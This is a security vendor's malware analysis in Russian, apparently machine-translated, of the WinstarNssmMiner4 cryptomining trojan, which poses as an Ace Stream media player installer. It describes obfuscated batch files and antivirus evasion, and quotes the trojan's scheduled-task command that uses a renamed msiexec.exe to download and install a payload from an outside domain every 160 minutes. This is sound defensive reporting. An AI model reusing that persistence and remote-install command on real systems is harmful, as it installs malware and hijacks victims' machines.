360 Центр безопасности обнаружил тип активно распространяющегося трояна-КриптоМайнера, заразившего 60 тысяч компьютеров в течение одного дня. Это вариант WinstarNssmMiner и маскируется как различные типы установщиков служебных программ, таких как медиаплеер Ace Stream. Мы назвали трояна «WinstarNssmMiner4». По сравнению с последней версией, эта версия загружается и продвигается известным хорошим программным обеспечением, таким как Wget, и обфускает все его скрипты выполнения, чтобы избежать обнаружения антивируса. Настоятельно рекомендуется загружать программное обеспечение с официальных сайтов вместо неизвестных источников.
Анализ
Троян маскируется как установщик Медиа Плеер Ace Stream. Он построен в формате MSI и содержит два пакетных файла, файл вывода uzip и файл Wget zip.
В пакетных файлах было добавлено много бессмысленных символов для обфускации вредоносных скриптов. Этот тип обфускации перемежает скрипт со случайными пустыми параметрами, чтобы избежать обнаружения антивируса. Ниже приведено сравнение восстановленного файла и обфускационный файл ALL.bat.
ALL.bat проверяет, установлено ли какое-либо антивирусное программное обеспечение, такое как Kaspersky, ESET или DrWeb. Он удаляет все файлы, связанные с троянцем, и заканчивает его процесс, если в системе существует какое-либо из этих антивирусных программ. В противном случае он извлекает Wget для загрузки установщика Медиа Плеер Ace Stream, а также запускает пакетный файл i.bat для установки трояна.
i.bat также запутывается. Разница между восстановленным файлом показана ниже.
i.bat добавляет запланированную задачу для загрузки криптомайнера. Троян дублирует системный файл «msiexec.exe» со случайным именем файла и составляет содержание задания по URL-адресу с комбинацией имени домена «» rbklong.info «. Это позволяет избежать обнаружения антивирусом через функцию загрузки файлов MSI.
Запланированная задача запускает следующую команду в командной строке:
schtasks / create / tn «»»» TEST-18721 «»»» / tr «»»» ‘C: \ WINDOWS \ System32 \ 2632313938.exe’ / i http://rbklong.info/13938.ace / q «»»» / sc minute / mo 160 / rl максимум / f
2632313938.exe — переименованный msiexec.exe. В настоящее время URL недоступен. После того, как URL-адрес находится в сети, задача расписания будет запускать троян для доступа к URL каждые 160 минут для обновления, и пользователь будет заражен.
Он также использует Wget для продвижения и загрузки установщика по URL-адресу http://dl.acestream.org/Ace_Stream_Media_3.1.28.exe
Напоминание
В последние дни мы обнаружили, что многие трояны-КриптоМайтены активно распространяются. Мы настоятельно рекомендуем пользователям включать антивирусное программное обеспечение при установке новых приложений. Пользователям также рекомендуется запускать проверку на вирусы с помощью 360 Total Security, чтобы не стать жертвой КриптоМайнеров.